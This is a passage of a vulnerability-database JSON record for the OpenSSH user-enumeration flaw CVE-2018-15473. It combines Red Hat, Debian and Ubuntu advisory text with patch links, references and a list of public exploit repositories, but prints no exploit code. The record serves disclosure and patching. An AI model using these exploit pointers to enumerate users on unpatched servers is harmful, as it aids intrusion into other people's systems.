x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nOpenSSH is an SSH protocol implementation supported by a number of Linux,\nUNIX, and similar operating systems. It includes the core files necessary\nfor both the OpenSSH client and server. \n\nSecurity Fix(es):\n\n* openssh: User enumeration via malformed packets in authentication\nrequests (CVE-2018-15473)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.7 Release Notes linked from the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nAfter installing this update, the OpenSSH server daemon (sshd) will be\nrestarted automatically. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1583735 - Permission denied reading authorized_keys when setting AuthorizedKeysCommand\n1619063 - CVE-2018-15473 openssh: User enumeration via malformed packets in authentication requests\n1712053 - tmux session not attached automatically during manual installation on s390x\n1722446 - openssh FIPS cipher list has an extra comma in it\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nopenssh-7.4p1-21.el7.src.rpm\n\nx86_64:\nopenssh-7.4p1-21.el7.x86_64.rpm\nopenssh-askpass-7.4p1-21.el7.x86_64.rpm\nopenssh-clients-7.4p1-21.el7.x86_64.rpm\nopenssh-debuginfo-7.4p1-21.el7.x86_64.rpm\nopenssh-keycat-7.4p1-21.el7.x86_64.rpm\nopenssh-server-7.4p1-21.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nopenssh-cavs-7.4p1-21.el7.x86_64.rpm\nopenssh-debuginfo-7.4p1-21.el7.i686.rpm\nopenssh-debuginfo-7.4p1-21.el7.x86_64.rpm\nopenssh-ldap-7.4p1-21.el7.x86_64.rpm\nopenssh-server-sysvinit-7.4p1-21.el7.x86_64.rpm\npam_ssh_agent_auth-0.10.3-2.21.el7.i686.rpm\npam_ssh_agent_auth-0.10.3-2.21.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nopenssh-7.4p1-21.el7.src.rpm\n\nx86_64:\nopenssh-7.4p1-21.el7.x86_64.rpm\nopenssh-clients-7.4p1-21.el7.x86_64.rpm\nopenssh-debuginfo-7.4p1-21.el7.x86_64.rpm\nopenssh-keycat-7.4p1-21.el7.x86_64.rpm\nopenssh-server-7.4p1-21.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nopenssh-askpass-7.4p1-21.el7.x86_64.rpm\nopenssh-cavs-7.4p1-21.el7.x86_64.rpm\nopenssh-debuginfo-7.4p1-21.el7.i686.rpm\nopenssh-debuginfo-7.4p1-21.el7.x86_64.rpm\nopenssh-ldap-7.4p1-21.el7.x86_64.rpm\nopenssh-server-sysvinit-7.4p1-21.el7.x86_64.rpm\npam_ssh_agent_auth-0.10.3-2.21.el7.i686.rpm\npam_ssh_agent_auth-0.10.3-2.21.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nopenssh-7.4p1-21.el7.src.rpm\n\nppc64:\nopenssh-7.4p1-21.el7.ppc64.rpm\nopenssh-askpass-7.4p1-21.el7.ppc64.rpm\nopenssh-clients-7.4p1-21.el7.ppc64.rpm\nopenssh-debuginfo-7.4p1-21.el7.ppc64.rpm\nopenssh-keycat-7.4p1-21.el7.ppc64.rpm\nopenssh-server-7.4p1-21.el7.ppc64.rpm\n\nppc64le:\nopenssh-7.4p1-21.el7.ppc64le.rpm\nopenssh-askpass-7.4p1-21.el7.ppc64le.rpm\nopenssh-clients-7.4p1-21.el7.ppc64le.rpm\nopenssh-debuginfo-7.4p1-21.el7.ppc64le.rpm\nopenssh-keycat-7.4p1-21.el7.ppc64le.rpm\nopenssh-server-7.4p1-21.el7.ppc64le.rpm\n\ns390x:\nopenssh-7.4p1-21.el7.s390x.rpm\nopenssh-askpass-7.4p1-21.el7.s390x.rpm\nopenssh-clients-7.4p1-21.el7.s390x.rpm\nopenssh-debuginfo-7.4p1-21.el7.s390x.rpm\nopenssh-keycat-7.4p1-21.el7.s390x.rpm\nopenssh-server-7.4p1-21.el7.s390x.rpm\n\nx86_64:\nopenssh-7.4p1-21.el7.x86_64.rpm\nopenssh-askpass-7.4p1-21.el7.x86_64.rpm\nopenssh-clients-7.4p1-21.el7.x86_64.rpm\nopenssh-debuginfo-7.4p1-21.el7.x86_64.rpm\nopenssh-keycat-7.4p1-21.el7.x86_64.rpm\nopenssh-server-7.4p1-21.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nopenssh-cavs-7.4p1-21.el7.ppc64.rpm\nopenssh-debuginfo-7.4p1-21.el7.ppc.rpm\nopenssh-debuginfo-7.4p1-21.el7.ppc64.rpm\nopenssh-ldap-7.4p1-21.el7.ppc64.rpm\nopenssh-server-sysvinit-7.4p1-21.el7.ppc64.rpm\npam_ssh_agent_auth-0.10.3-2.21.el7.ppc.rpm\npam_ssh_agent_auth-0.10.3-2.21.el7.ppc64.rpm\n\nppc64le:\nopenssh-cavs-7.4p1-21.el7.ppc64le.rpm\nopenssh-debuginfo-7.4p1-21.el7.ppc64le.rpm\nopenssh-ldap-7.4p1-21.el7.ppc64le.rpm\nopenssh-server-sysvinit-7.4p1-21.el7.ppc64le.rpm\npam_ssh_agent_auth-0.10.3-2.21.el7.ppc64le.rpm\n\ns390x:\nopenssh-cavs-7.4p1-21.el7.s390x.rpm\nopenssh-debuginfo-7.4p1-21.el7.s390.rpm\nopenssh-debuginfo-7.4p1-21.el7.s390x.rpm\nopenssh-ldap-7.4p1-21.el7.s390x.rpm\nopenssh-server-sysvinit-7.4p1-21.el7.s390x.rpm\npam_ssh_agent_auth-0.10.3-2.21.el7.s390.rpm\npam_ssh_agent_auth-0.10.3-2.21.el7.s390x.rpm\n\nx86_64:\nopenssh-cavs-7.4p1-21.el7.x86_64.rpm\nopenssh-debuginfo-7.4p1-21.el7.i686.rpm\nopenssh-debuginfo-7.4p1-21.el7.x86_64.rpm\nopenssh-ldap-7.4p1-21.el7.x86_64.rpm\nopenssh-server-sysvinit-7.4p1-21.el7.x86_64.rpm\npam_ssh_agent_auth-0.10.3-2.21.el7.i686.rpm\npam_ssh_agent_auth-0.10.3-2.21.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nopenssh-7.4p1-21.el7.src.rpm\n\nx86_64:\nopenssh-7.4p1-21.el7.x86_64.rpm\nopenssh-askpass-7.4p1-21.el7.x86_64.rpm\nopenssh-clients-7.4p1-21.el7.x86_64.rpm\nopenssh-debuginfo-7.4p1-21.el7.x86_64.rpm\nopenssh-keycat-7.4p1-21.el7.x86_64.rpm\nopenssh-server-7.4p1-21.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nopenssh-cavs-7.4p1-21.el7.x86_64.rpm\nopenssh-debuginfo-7.4p1-21.el7.i686.rpm\nopenssh-debuginfo-7.4p1-21.el7.x86_64.rpm\nopenssh-ldap-7.4p1-21.el7.x86_64.rpm\nopenssh-server-sysvinit-7.4p1-21.el7.x86_64.rpm\npam_ssh_agent_auth-0.10.3-2.21.el7.i686.rpm\npam_ssh_agent_auth-0.10.3-2.21.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2018-15473\nhttps://access.redhat.com/security/updates/classification/#low\nhttps://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/7.7_release_notes/index\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2019 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBXUl2+9zjgjWX9erEAQghMQ//ao8h2SV6O/qKXHnO+WB1PYTD3rzASW8f\npE++fRS0YTGtkoCmwEsYDRqg7Xw+3LIX/j8gYztFtMDoU7alLTkywBvszsBvRSCF\nXi2yutUkhcygCldcwrHwNgVGa2kMni6Fm/O2ZCLkHdOHZLwMOZjBe0T4Ompc2ok5\nTshNRwUWjCfzY3pwG1c9lffrfq2/DgIzi+o9MCjNCaRgFKDo9Ufgw93CSmPm/61u\nWVr7pV/+yXRlswG0ZnK3gOK19lYQIQfS9sQJzFelcF1pOCseZUqiKOTVMcBP0XaB\nuIODY4Ra/BRX9pLXN9JkBTBE8iSPO+VGKoF/m9urqpg7Z+kaH2KwdyrJeHIzY/mA\ne1Cidd4RsK9HwwBoRdIlw6MjstoymmF2OaYcO0Yb36abUWEF0CFIZQeAZR89ZvGG\nzKnc+YybH/ELu1VEF7CfBQFyP6DFt8fgFvBI5yCCjzxy0XYVrave6zLO+6a7Hg94\n5UDWDIIT7h55CYlfCiZ4pBClRJSO4/XKs3lcUsvirnyagyO5it1yZpkCiavFfcah\nPewUzfp6mz5BXUUhJHDdFe/LgAWE7DCiMy1A78iKy0kY4Yu/tgfgMJ/KXYnyIj62\nmY7o0lHcjBNHqUVDscNOtbV3EG7jsgHI1XtTIOlBeijkmPaDZnnMbM5ZXhhDzGPV\nfl5KApr4ST8=wPC+\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 1:7.4p1-10+deb9u4. \n\nWe recommend that you upgrade your openssh packages. \n\nFor the detailed security status of openssh please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/openssh\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQEzBAEBCgAdFiEEAqSkbVtrXP4xJMh3EL6Jg/PVnWQFAlt9ATUACgkQEL6Jg/PV\nnWSHYggArjTv1/72Mxj8D8qXRiixHTY3QIRki03VOLQtk7tje8BmymeRerwmECGh\nfjBuF4sueVrBED7vWpf9+HU9Z8VYLDKQp56xMLlqnt1Ge5HaPVHLToY4gn/lOl+J\npFGwn4BKYMlo+v/rnWg1Ay0n8DZnmg8GnBqgpeFI56AUy4rw9eaRAByI80Btd69u\nvInT9A/sOYmywD4fH6cl7JDDZHF1AxgkW9Jar/tTVQtR/PqT7Cb2RJmxOB75/BrG\n/8etuiWfh6sY4cBZco+AkXL2Yb97bJQdwDZQwqMLJtA2rdjSGA3zQdnzM8htrSYH\np0SeM24q209KRsvXG9KM3vKWW4vohw==\n=qxOC\n-----END PGP SIGNATURE-----\n. ==========================================================================\nUbuntu Security Notice USN-3809-2\nAugust 12, 2021\n\nopenssh regression\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 18.04 LTS\n\nSummary:\n\nUSN-3809-1 introduced a regression in OpenSSH. \n\nSoftware Description:\n- openssh: secure shell (SSH) for secure access to remote machines\n\nDetails:\n\nUSN-3809-1 fixed vulnerabilities in OpenSSH. The update for CVE-2018-15473\nwas incomplete and could introduce a regression in certain environments. \nThis update fixes the problem. \n\nWe apologize for the inconvenience. \n\nOriginal advisory details:\n\n Robert Swiecki discovered that OpenSSH incorrectly handled certain messages. \n An attacker could possibly use this issue to cause a denial of service. \n This issue only affected Ubuntu 14.04 LTS and Ubuntu 16.04 LTS. \n (CVE-2016-10708)\n It was discovered that OpenSSH incorrectly handled certain requests. \n An attacker could possibly use this issue to access sensitive information. \n (CVE-2018-15473)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 18.04 LTS:\n openssh-server 1:7.6p1-4ubuntu0.5\n\nIn general, a standard system update will make all the necessary changes", "sources": [ { "db": "NVD", "id": "CVE-2018-15473" }, { "db": "JVNDB", "id": "JVNDB-2018-009191" }, { "db": "BID", "id": "105140" }, { "db": "VULHUB", "id": "VHN-125736" }, { "db": "VULMON", "id": "CVE-2018-15473" }, { "db": "PACKETSTORM", "id": "149694" }, { "db": "PACKETSTORM", "id": "152444" }, { "db": "PACKETSTORM", "id": "150190" }, { "db": "PACKETSTORM", "id": "153906" }, { "db": "PACKETSTORM", "id": "149037" }, { "db": "PACKETSTORM", "id": "163809" } ], "trust": 2.61 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=45233", "trust": 0.2, "type": "exploit" }, { "reference": "https://www.scap.org.cn/vuln/vhn-125736", "trust": 0.1, "type": "unknown" } ], "sources": [ { "db": "VULHUB", "id": "VHN-125736" }, { "db": "VULMON", "id": "CVE-2018-15473" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2018-15473", "trust": 3.5 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2018/08/15/5", "trust": 2.5 }, { "db": "SECTRACK", "id": "1041487", "trust": 2.5 }, { "db": "BID", "id": "105140", "trust": 2.0 }, { "db": "EXPLOIT-DB", "id": "45939", "trust": 1.7 }, { "db": "EXPLOIT-DB", "id": "45210", "trust": 1.7 }, { "db": "EXPLOIT-DB", "id": "45233", "trust": 1.7 }, { "db": "SIEMENS", "id": "SSA-412672", "trust": 1.7 }, { "db": "MCAFEE", "id": "SB10266", "trust": 0.9 }, { "db": "PACKETSTORM", "id": "152444", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2018-009191", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201808-536", "trust": 0.7 }, { "db": "PACKETSTORM", "id": "163809", "trust": 0.7 }, { "db": "AUSCERT", "id": "ESB-2019.1277", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2020.3514", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2019.0936", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2020.1557", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2019.1212", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2020.3462", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2020.0102", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2020.0342", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.2750", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2021081216", "trust": 0.6 }, { "db": "NSFOCUS", "id": "43154", "trust": 0.6 }, { "db": "PACKETSTORM", "id": "149694", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "149037", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "153906", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "150621", "trust": 0.1 }, { "db": "SEEBUG", "id": "SSVID-97503", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-125736", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2018-15473", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "150190", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-125736" }, { "db": "VULMON", "id": "CVE-2018-15473" }, { "db": "BID", "id": "105140" }, { "db": "JVNDB", "id": "JVNDB-2018-009191" }, { "db": "PACKETSTORM", "id": "149694" }, { "db": "PACKETSTORM", "id": "152444" }, { "db": "PACKETSTORM", "id": "150190" }, { "db": "PACKETSTORM", "id": "153906" }, { "db": "PACKETSTORM", "id": "149037" }, { "db": "PACKETSTORM", "id": "163809" }, { "db": "NVD", "id": "CVE-2018-15473" }, { "db": "CNNVD", "id": "CNNVD-201808-536" } ] }, "id": "VAR-201808-0455", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-125736" } ], "trust": 0.49475753999999994 }, "last_update_date": "2023-12-18T11:15:45.228000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "[SECURITY] [DLA-1474-1] openssh security update", "trust": 0.8, "url": "https://lists.debian.org/debian-lts-announce/2018/08/msg00022.html" }, { "title": "#906236", "trust": 0.8, "url": "https://bugs.debian.org/906236" }, { "title": "DSA-4280", "trust": 0.8, "url": "https://www.debian.org/security/2018/dsa-4280" }, { "title": "delay bailout for invalid authenticating user until after the packet", "trust": 0.8, "url": "https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0" }, { "title": "OpenSSH Security vulnerabilities", "trust": 0.6, "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=84138" }, { "title": "Red Hat: Low: openssh security, bug fix, and enhancement update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20192143 - security advisory" }, { "title": "Red Hat: Low: openssh security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20190711 - security advisory" }, { "title": "Debian CVElist Bug Report Logs: openssh: CVE-2018-15473: delay bailout for invalid authenticating user until after the packet", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=03af68f4d7fde0c3fb73e02126ff3a8e" }, { "title": "Debian Security Advisories: DSA-4280-1 openssh -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=2a7b5fb5e55d81eb17c62731bbbfd77a" }, { "title": "Ubuntu Security Notice: openssh vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3809-1" }, { "title": "Debian CVElist Bug Report Logs: dropbear: CVE-2018-15599", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=7c424f6ef8f9ae42d937439b82dd93b6" }, { "title": "Amazon Linux AMI: ALAS-2018-1075", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2018-1075" }, { "title": "Red Hat: CVE-2018-15473", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2018-15473" }, { "title": "IBM: IBM Security Bulletin: IBM BladeCenter Advanced Management Module (AMM) is affected by vulnerability in OpenSSH (CVE-2018-15473)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=253611bf347a972572fe2b907ea5475f" }, { "title": "Arch Linux Issues: ", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2018-15473" }, { "title": "IBM: IBM Security Bulletin: IBM QRadar Network Security is affected by an openssh vulnerability (CVE-2018-15473)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=7a5223ad10e1ecdb6ac4eeefcf28a096" }, { "title": "Amazon Linux 2: ALAS2-2018-1075", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2-2018-1075" }, { "title": "IBM: IBM Security Bulletin: IBM Flex System Chassis Management Module (CMM) is affected by vulnerabilities in OpenSSH (CVE-2018-15473 CVE-2018-15919)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=10fccabd4c7b965694dd52ad1484a543" }, { "title": "Citrix Security Bulletins: Citrix Hypervisor Security Update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins\u0026qid=93d4930e8ac6de6dc742ba1d0a2eb835" }, { "title": "Symantec Security Advisories: OpenSSH Vulnerabilities Jan-Aug 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=eafec7859e071aa17b0b5511d3b3eb53" }, { "title": "IBM: IBM Security Bulletin: IBM Dynamic System Analysis (DSA) Preboot is affected by vulnerabilities in OpenSSH", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=09467db835e132cd1a0a8012efa155dc" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - April 2019", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=0cf12ffad0c479958deb0741d0970b4e" }, { "title": "IBM: IBM Security Bulletin: Multiple Security Vulnerabilities have been addressed in IBM Security Access Manager Appliance", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=800337bc69aa7ad92ac88a2adcc7d426" }, { "title": "Oracle VM Server for x86 Bulletins: Oracle VM Server for x86 Bulletin - April 2019", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_vm_server_for_x86_bulletins\u0026qid=d08e40deea44ef7cc7cf69a5cbffc984" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - January 2019", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=aea3fcafd82c179d3a5dfa015e920864" }, { "title": "SUF", "trust": 0.1, "url": "https://github.com/ghostwalkr/suf " }, { "title": "cve-2018-15473", "trust": 0.1, "url": "https://github.com/epi052/cve-2018-15473 " }, { "title": "CVE-2018-15473-Exploit", "trust": 0.1, "url": "https://github.com/rhynorater/cve-2018-15473-exploit " }, { "title": "cve-2018-15473", "trust": 0.1, "url": "https://github.com/wh1t3fox/cve-2018-15473 " }, { "title": "", "trust": 0.1, "url": "https://github.com/live-hack-cve/cve-2018-15473 " }, { "title": "CVE-2018-15473_exploit", "trust": 0.1, "url": "https://github.com/pyperanger/cve-2018-15473_exploit " }, { "title": "", "trust": 0.1, "url": "https://github.com/pixiel333/pentest-cheat-sheet " }, { "title": "tools-bbounty", "trust": 0.1, "url": "https://github.com/korbanbbt/tools-bbounty " }, { "title": "CVE-2018-15473", "trust": 0.1, "url": "https://github.com/1stpeak/cve-2018-15473 " }, { "title": "cve-2018-15473", "trust": 0.1, "url": "https://github.com/cved-sources/cve-2018-15473 " }, { "title": "CVE-2018-15473_OpenSSH_7.7", "trust": 0.1, "url": "https://github.com/wildfootw/cve-2018-15473_openssh_7.7 " }, { "title": "SUOPE", "trust": 0.1, "url": "https://github.com/angry-bender/suope " }, { "title": "patch_exploit_ssh", "trust": 0.1, "url": "https://github.com/gustavorobertux/patch_exploit_ssh " }, { "title": "CVE-2018-15473", "trust": 0.1, "url": "https://github.com/sait-nuri/cve-2018-15473 " }, { "title": "WebMap", "trust": 0.1, "url": "https://github.com/jcradarsniper/webmap " }, { "title": "shodan-CVE-2018-15473", "trust": 0.1, "url": "https://github.com/66quentin/shodan-cve-2018-15473 " }, { "title": "CVE-2018-15473", "trust": 0.1, "url": "https://github.com/robiul-awal/cve-2018-15473 " }, { "title": "", "trust": 0.1, "url": "https://github.com/0xrobiul/cve-2018-15473 " }, { "title": "CVE-2018-15473", "trust": 0.1, "url": "https://github.com/r3dxpl0it/cve-2018-15473 " }, { "title": "CVE-2018-15473-exp", "trust": 0.1, "url": "https://github.com/linyikai/cve-2018-15473-exp " } ], "sources": [ { "db": "VULMON", "id": "CVE-2018-15473" }, { "db": "JVNDB", "id": "JVNDB-2018-009191" }, { "db": "CNNVD", "id": "CNNVD-201808-536" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-362", "trust": 1.1 }, { "problemtype": "CWE-200", "trust": 0.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-125736" }, { "db": "JVNDB", "id": "JVNDB-2018-009191" }, { "db": "NVD", "id": "CVE-2018-15473" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.5, "url": "http://www.securityfocus.com/bid/105140" }, { "trust": 2.5, "url": "http://www.openwall.com/lists/oss-security/2018/08/15/5" }, { "trust": 2.5, "url": "http://www.securitytracker.com/id/1041487" }, { "trust": 2.4, "url": "https://access.redhat.com/errata/rhsa-2019:0711" }, { "trust": 2.0, "url": "https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0" }, { "trust": 1.8, "url": "https://security.gentoo.org/glsa/201810-03" }, { "trust": 1.8, "url": "https://access.redhat.com/errata/rhsa-2019:2143" }, { "trust": 1.7, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf" }, { "trust": 1.7, "url": "https://psirt.global.sonicwall.com/vuln-detail/snwlid-2018-0011" }, { "trust": 1.7, "url": "https://security.netapp.com/advisory/ntap-20181101-0001/" }, { "trust": 1.7, "url": "https://www.debian.org/security/2018/dsa-4280" }, { "trust": 1.7, "url": "https://www.exploit-db.com/exploits/45210/" }, { "trust": 1.7, "url": "https://www.exploit-db.com/exploits/45233/" }, { "trust": 1.7, "url": "https://www.exploit-db.com/exploits/45939/" }, { "trust": 1.7, "url": "https://bugs.debian.org/906236" }, { "trust": 1.7, "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "trust": 1.7, "url": "https://lists.debian.org/debian-lts-announce/2018/08/msg00022.html" }, { "trust": 1.7, "url": "https://usn.ubuntu.com/3809-1/" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-15473" }, { "trust": 1.1, "url": "https://access.redhat.com/security/cve/cve-2018-15473" }, { "trust": 0.9, "url": "https://github.com/rhynorater/cve-2018-15473-exploit" }, { "trust": 0.9, "url": "http://www.openssh.com" }, { "trust": 0.9, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1619063" }, { "trust": 0.9, "url": "https://www.oracle.com/technetwork/topics/security/ovmbulletinapr2019-5461368.html" }, { "trust": 0.9, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10266" }, { "trust": 0.9, "url": "http://aix.software.ibm.com/aix/efixes/security/openssh_advisory12.asc" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-15473" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1284766" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1284760" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1284772" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1284778" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1284784" }, { "trust": 0.6, "url": "http://www.ibm.com/support/docview.wss?uid=ibm10880795" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1170328" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1170340" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1170334" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1170322" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1170352" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1170346" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-a-security-vulnerability-has-been-addressed-in-ibm-security-privileged-identity-manager/" }, { "trust": 0.6, "url": "https://packetstormsecurity.com/files/152444/red-hat-security-advisory-2019-0711-01.html" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-identity-manager-virtual-appliance-is-affected-by-multiple-vulnerabilities-cve-2019-4674-cve-2018-15473-cve-2019-4675/" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2021081216" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2020.0342/" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1101975" }, { "trust": 0.6, "url": "https://packetstormsecurity.com/files/163809/ubuntu-security-notice-usn-3809-2.html" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/77578" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2020.3462/" }, { "trust": 0.6, "url": "http://www.nsfocus.net/vulndb/43154" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2020.3514/" }, { "trust": 0.6, "url": "https://www-01.ibm.com/support/docview.wss?uid=ibm10880777" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerability-have-been-addressed-in-ibm-security-directory-suite-cve-2018-15473/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2020.1557/" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-openssh-affects-ibm-integrated-analytics-system/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2020.0102/" }, { "trust": 0.6, "url": 